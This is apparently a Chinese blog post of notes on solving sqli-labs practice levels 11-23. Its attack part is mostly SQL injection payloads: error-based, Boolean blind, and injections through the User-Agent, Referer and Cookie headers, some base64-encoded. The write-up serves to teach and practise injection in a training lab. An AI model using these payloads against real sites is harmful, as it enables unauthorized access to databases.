sqli-labs靶场笔记(四)

最新推荐文章于 2024-08-14 21:05:20 发布
最新推荐文章于 2024-08-14 21:05:20 发布
阅读量138 收藏
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Vi_vids/article/details/110939159
版权

sqli-labs靶场笔记(四)

Less-11【报错注入|'注入】

该网站使用POST请求方式,使用Live HTTP header进行注入操作
在这里插入图片描述
判断username存在注入
在这里插入图片描述
在这里插入图片描述
得到username对应的密码
使用burp-repeater模块

payload 1

uname=admin’ and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit

payload 2

uname=admin’ and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
在这里插入图片描述

Less-12【报错注入|")注入】

在这里插入图片描述
使用单引号直接爆错【没有回显】,尝试使用双引号【回显报错】
在这里插入图片描述
在这里插入图片描述
使用burp

payload 1

uname=admin") and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit

payload 2

uname=admin") and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
在这里插入图片描述

Less-13【报错注入|’)注入】

开始先用单引号试水,报错回显
在这里插入图片描述
在这里插入图片描述

使用burp

payload 1

uname=admin’) and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit

payload 2

uname=admin’) and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
在这里插入图片描述

Less-14【报错注入|"注入】

单引号注入没有回显,尝试双引号【报错回显】
在这里插入图片描述
在这里插入图片描述
使用burp

payload 1

uname=admin" and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit

payload 2

uname=admin" and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
在这里插入图片描述

Less-15【Boolean盲注|'注入】

下面展示 payload

admin' order by 2 #

这里采用Boolean盲注
使用单引号、双引号试探,没有明显报错回显,不为报错注入
在这里插入图片描述
在这里插入图片描述
存在注入
在这里插入图片描述
在这里插入图片描述
该表存在2个属性列
使用burp的Repeater模块
在这里插入图片描述
在这里插入图片描述
判断数据库名长度为8
使用burp的爆破模块
在这里插入图片描述
在这里插入图片描述
得到数据库名为security

Less-16【Boolean盲注】|")注入】

下面展示一些 payload

admin") #
admin") order by 2 #
admin") and ascii(substr((select database()),1,1))=115 #
admin")  and ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 1,1),1,1))=95 #

在这里插入图片描述

在这里插入图片描述
得到数据库名security
在这里插入图片描述
得到数据库一个表名

Less-17【报错注入|'注入】

下面展示payload

admin' and (extractvalue(1,concat('~',(select database()))))#

在这里插入图片描述
在这里插入图片描述
接下来使用burp的repeater模块
在这里插入图片描述
在这里插入图片描述

Less-18【user-agent注入|报错注入|'注入|注释符屏蔽】

值得注意的是该题屏蔽了注释符:–+和#,所以改用‘a’=‘a代替
下面展示payload

' and (extractvalue(1,concat('~',select database()))) and 'a'='a

在这里插入图片描述

该题对输入框的两个地方进行了设置、过滤,故无法向其中实现注入;但是,发现查询语句从user Agent写入
在这里插入图片描述

在这里插入图片描述

Less-19【referer注入|报错注入|'注入|注释符屏蔽】

下面展示payload

referer:http://XXX.XXX.XXX.XXX:XXX/sqli-labs/Less-19/' and (extractvalue(1,concat('~',(select database()))))and 'a'='a

在这里插入图片描述

在这里插入图片描述

Less-20【Cookie注入|报错注入|'注入】

下面展示 payload

Cookie: uname=admin' and extractvalue(1,concat('~',(select database()))) #

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Less-21【Cookie注入|报错注入|’)注入】

')进行base64Encode发现存在注入
下面展示 payload

Cookie: uname=YWRtaW4nKQ==
//这里basedecode为:admin’)
Cookie:uname=YWRtaW4nKSBhbmQgKGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgnficsKHNlbGVjdCBkYXRhYmFzZSgpKSkpKSAj
//这里base64decode为:admin') and (extractvalue(1,concat('~',(select database())))) #

在这里插入图片描述
在这里插入图片描述

Less-22【Cookie注入|报错注入|"注入】

下面展示 payload

Cookie: uname=YWRtaW4i
//这里basedecode为:admin"
Cookie:uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSkpKSAj
//这里base64decode为:admin" and extractvalue(1,concat('~',(select database()))) #

在这里插入图片描述

在这里插入图片描述

Less-23【报错注入|’注入|注释符屏蔽】

下面展示 payload

id=1' and extractvalue(1,concat('~',(select database()))) and 'a'='a

在这里插入图片描述

Vi_vids
关注
专栏目录
SQLI-LABS 靶场通过小记(23~38)
曹振国的博客
07-14 847
23~38Less-23:1.加单引号让后面闭合2.使用逻辑运算注入Less-24:Less-25:1.查看源码2.双写搭配大小写匹配关键字绕过3.关键字等价绕过Less-25a:Less-26:1.查看源码发现过滤了,and,or,空格及注释2.通过ascii码转url编码进行绕过Less-26a:Less-27:1.大小写交错绕过2.盲注绕过Less-27a:Less-28:Less-28a:1.同28题使用盲注:2.显错注入(28题也适用):Less-29(网站由世界上最好的防火墙保护):1.查询库名
SQLI-LABS 靶场通关小记(1~22)
曹振国的博客
07-14 3790
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
sqli-labs靶场笔记
qq_33441500的博客
10-20 236
less-1 单引号的显错注入 关键代码段 直接输入单引号让其报错 由代码我们可以看出数据库查询语句只是对id传参进行了...
sqli-labs靶场通关攻略
最新发布
test_zpx的博客
08-14 557
Good Good Study,Day Day Up!
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1384
Sqli-labs 靶场通关学习记录
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 7052
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 771
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs靶场Less-7
songling515010475的专栏
08-21 375
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。 1、访问首页,/Less-7/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下: 结果1: 结果2: 分析:这里我尝试不管是怎么样,通过...
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
sqli-labs靶场】第11关
qq_61019688的博客
04-26 836
知道了sql语句,接下来就是构造sql语句来进行查询,例如1’ or 1=1#(注意此处不能再使用and来构造恒真语句,因为我们不知道username和password,所以要想判断sql语句是否执行要使用or,这样or后面的语句为true则执行,为false则报错)(还有一个注意点的此处不能再用--+来注释,要使用#)1’ order by 2#,无返回内容,由此可以判断出列数应该是2,对于为啥order by 2无内容返回因为是可能不存在username=1,所以查不到内容。1’ or 1=2#报错。
sqli-labs靶场1-12关通关记录
SEV__en的博客
07-25 1749
攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。
SQLi-Labs靶场通关笔记(1~21关)
trdtyvu的博客
07-06 1777
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡。
SQLI-labs 通关笔记靶场安装
fyrmaryt的博客
02-27 627
SQLI-labs通关笔记之安装及介绍篇。
sql-lib 1-10关
鸣蜩十四的博客
06-14 705
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 2130
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
sqli-labs靶场笔记(一)
Vi_vids的博客
12-06 215
sqli-labs靶场笔记(一) Less-01 下面展示一些 会用到的payload。 id=-1' union select 1,user(),database() --+ id=-1' or exist(select * from information_schema_columns) --+ id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='secur
靶场sqli-labs的练习笔记(基础知识)第一章
m0_55314368的博客
06-13 263
在获得了数据库名称之后我们来查询表名,表名又有很多种,刚才爆出了emails、referers,uagents,user这些表名,通常我们需要拿到一些敏感数据的时候,我们首先会对user表中的数据感兴趣,先进入user中查看。加入联合语句,查看没有变换,那么已知id=1是正确的,所有后面才有可能不显示,尝试修改让前面的信息报错id=-1,并且判断闭合方式为id=1'这段语句的作用是查询table_schma=当前数据库名称的,刚才根据SQL注入点报错,我们可以得到database()=security。
靶场sqli-labs的练习笔记(盲注Blind SQL、报错注入等)第二章
m0_55314368的博客
06-16 205
2.时间注入,页面返回的值只有一种的时候(即为无论输入什么结果都按照正常的进行处理0),那么这时候我们就需要通过时间函数进行时间注入,通过页面的相应时间进行判断语句是否输入正确。由于and必须两边的条件都要满足,左边id=1肯定是真值,那么如果length函数猜错不等于8的时候就会没有回显。同理若ascii(substr(database(),1,1))=116中成立则执行1即通过,如果不成立则休眠。从而才出他的完整性。左边id=1必定成立,若右边不成立则没有反应,若为正确的返回不同的结果。
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值